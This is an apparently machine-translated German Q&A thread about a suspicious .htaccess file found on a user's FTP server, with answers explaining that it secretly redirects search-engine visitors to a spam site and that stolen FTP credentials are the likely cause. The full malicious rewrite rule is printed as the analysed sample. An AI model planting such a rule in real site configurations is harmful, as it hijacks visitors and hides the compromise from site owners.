Verdächtige .htaccess-Datei

20

Dies wurde in einen meiner FTP-Ordner hochgeladen. Ich bin mit Apache nicht vertraut, aber immer noch neugierig - kann mir jemand sagen, welche Art von hinterhältiger Handlung diese Datei zu begehen versucht? Vielen Dank!

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
apache-2.2 security mod-rewrite .htaccess ovinophil
quelle
1
NETT! (Auf eine böse Art und Weise ...) Nimmt im Grunde alle, die von einer Suchmaschine auf Ihre Website kommen, und leitet sie um 23:17
Uhr
War mir das schon einmal passiert? Die .htaccesszu meiner Site hinzugefügte Datei hatte oben ungefähr 40 Leerzeilen, nur um mich weiter zu verwirren.
TRiG

Antworten:

15

Dadurch werden Benutzer, die von einer Suchmaschine kommen, zur letzten Site weitergeleitet SPAMMER.info(siehe Fragenverlauf für die aktuelle Site).

Es sucht nach Empfehlern, um sich vor Ihnen zu verstecken , da Sie wahrscheinlich nicht über Suchmaschinen auf die Website zugreifen. Das heißt, wenn Sie direkt zur URL gehen, scheint alles normal zu sein. Wenn Sie jedoch über eine Suchmaschine hereinkommen, werden Sie umgeleitet.

Hinweis: Dies wirkt sich nicht auf Webcrawler aus, da diese ( zumindest Googlebot ) den Referrer-Header nicht setzen.

Michael Haren
quelle
8

Jedes Mal, wenn ein Benutzer einer Suchmaschine eine Seite Ihrer Website besucht, wird er zur Spam-Website .info weitergeleitet.

Es ist sehr hinterhältig - Sie werden nicht bemerken, dass etwas nicht stimmt, da Sie normalerweise nur die Adresse eingeben.

Greg
quelle
1
Leiten Sie keine Klicks, die über eine Suchmaschine kommen, um, da es sich um den Referrer handelt?
Betrifft es nicht auch Links von Google? Suchen Sie beispielsweise bei Google nach der Website des OP, klicken Sie darauf, und Sie werden weitergeleitet, seit Sie von Google kommen?
Ja, nur Links von Suchmaschinen (wie ich in meiner Antwort sagte), aber keine Suchmaschinen-Crawler / Bots. Diese Antwort wurde aktualisiert und ist nun korrekt. Ursprünglich wurde angegeben, dass dies nur für Bots gilt.
Michael Haren
1

um mehr hinzuzufügen - höchstwahrscheinlich sind Ihre FTP-Zugangsdaten durchgesickert. Vielleicht haben Sie sie in filezilla / total commander usw. gespeichert. Es gibt eine Menge Malware, die diese stiehlt und dann herumläuft - sich bei FTP-Konten anmeldet, schädliches Javascript an index.php / html anfügt oder ähnliche Umschreibedateien erstellt.

pQd
quelle
Ich stehe vor diesem Problem. Tag nach der Änderung einer anderen .htaccess-Datei tritt ein interner Serverfehler auf.
vnix27